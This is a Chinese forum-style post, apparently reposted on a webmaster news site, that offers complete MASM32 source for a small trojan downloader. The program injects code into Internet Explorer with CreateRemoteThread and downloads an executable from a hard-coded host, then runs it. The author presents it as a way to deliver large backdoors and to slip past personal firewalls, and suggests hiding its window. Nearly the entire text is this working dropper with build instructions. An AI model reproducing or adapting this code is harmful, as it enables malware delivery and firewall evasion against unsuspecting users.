| 大家可能都用过网页木马来下真正的EXE木马吧,但是有些时候 后门比较大下载的时候常常是网页暂停或是报错(CHM木马常遇到) 所以写了这个程序。。。。 程序还要改下才好用哈,不过只有2kb很小了。。。。 编绎参数: C:\masm32\BIN>type ii.bat ml /c /coff i.asm link /subsystem:windows i.obj 刚才测试了一下可以逃过天网的应用程序防问网络限制金山网镖也肯定没问题。 ; #--------------------------------------# # ; # Injection downloadcode in IE --> # # ; # -->also it can jump personal fire wall # # ; # 2004.07.15 # ; # codz: czy # # ; #------------------------------------------# # ;test on win2k server sp4 masm8 .386 .model flat,stdcall option casemap:none include ../include/user32.inc includelib ../lib/user32.lib include ../include/kernel32.inc includelib ../lib/kernel32.lib include ../include/windows.inc .data hello db ’2K下建远程线程’,0 tit db ’IEFrame’,0 szFormat db ’PID是:%d’,0 szBuffer dd 20 dup(0),0 pid dd 0 hProcess dd 0 hThread dd 0 pCodeRemote dd 0 path1 db ’c:\a.EXE’,0 .const szmsg db ’URLDownloadToFileA’,0 userdll db ’Urlmon.dll’,0 ;szmsg db ’MessageBoxA’,0 ;userdll db ’User32.dll’,0 szloadlib db ’LoadLibraryA’,0 ;注意和LoadLibraryW的区别哟 kerdll db ’kernel32.dll’,0 .code codebegin: dispdata db "http://192.168.0.5/NBTreeList.exe",0 szTit db "c:\a.exe",0 datalen =$-codebegin Rproc proc msgbox ;MessageBoxA的地址为参数 CALL @F ;push esi @@: POP EBX SUB EBX,OFFSET @B LEA ECX,[EBX dispdata] LEA EDX,[EBX szTit] push NULL push 0 push edx push ecx push NULL call msgbox ret ;重要 Rproc endp codelen =$-codebegin ;代码长度xx字节 start: ;invoke FindWindow,0,offset tit ;返回计算器窗口句柄 invoke FindWindow,offset tit,0 invoke GetWindowThreadProcessId,eax,offset pid ;计算机器程序的进程PID号 ;invoke wsprintf,offset szBuffer,offset szFormat,pid ;把PID用十进制显示 invoke OpenProcess,PROCESS_ALL_ACCESS,FALSE,pid ;打开进程,得到进程句柄 mov hProcess,eax ;保存进程句柄 invoke VirtualAllocEx,hProcess,0, codelen, MEM_COMMIT, PAGE_EXECUTE_READWRITE mov pCodeRemote,eax invoke WriteProcessMemory,hProcess,pCodeRemote,offset codebegin,codelen,NULL mov esi,pCodeRemote add esi,datalen push esi invoke LoadLibrary,offset userdll invoke GetProcAddress,eax,offset szmsg pop esi invoke CreateRemoteThread,hProcess,0,0,esi,eax,0,0 mov hThread,eax ; 返回线程句柄 .if hThread invoke WaitForSingleObject,hThread, INFINITE ;等待线程结束 invoke CloseHandle,hThread ;关闭线程句柄 .endif invoke VirtualFreeEx,hProcess,pCodeRemote,codelen,MEM_RELEASE ;释放空间 invoke CloseHandle,hProcess ;关闭进程句柄 invoke WinExec,offset path1,SW_SHOW ;以正常方式执行下载的木马。。到时候改一下就没窗口了。。 ;invoke MessageBoxA,0,offset szBuffer,offset szBuffer,1 invoke ExitProcess,0 end start |
免责声明:本站部分文章和图片均来自用户投稿和网络收集,旨在传播知识,文章和图片版权归原作者及原出处所有,仅供学习与参考,请勿用于商业用途,如果损害了您的权利,请联系我们及时修正或删除。谢谢!
始终以前瞻性的眼光聚焦站长、创业、互联网等领域,为您提供最新最全的互联网资讯,帮助站长转型升级,为互联网创业者提供更加优质的创业信息和品牌营销服务,与站长一起进步!让互联网创业者不再孤独!
扫一扫,关注站长网微信
大家都在看
